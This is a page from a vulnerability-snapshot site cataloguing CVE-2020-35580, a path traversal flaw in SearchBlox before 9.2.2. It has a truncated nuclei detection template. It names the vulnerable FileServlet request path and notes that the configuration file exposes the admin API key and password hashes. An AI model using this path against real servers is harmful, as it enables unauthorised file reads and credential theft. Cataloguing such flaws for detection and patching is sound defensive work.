Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-35580 PoC — SearchBlox 路径遍历漏洞

Source
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-35580.yaml
Associated Vulnerability
Title:SearchBlox 路径遍历漏洞 (CVE-2020-35580)
Description:SearchBlox是美国SearchBlox公司的一个应用软件。为内部部署或云部署提供了强大的企业搜索体系结构。 SearchBlox 9.2.2之前版本存在安全漏洞,该漏洞允许远程的、未经身份验证的用户通过/searchblox/servlet/FileServlet?col=url=从操作系统读取任意文件。
Description
SearchBlox prior to version 9.2.2 is susceptible to local file inclusion in  FileServlet that allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users.
File Snapshot

 id: CVE-2020-35580

info:
  name: SearchBlox <9.2.2 - Local File Inclusion
  author: daffainfo
  sev

...
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.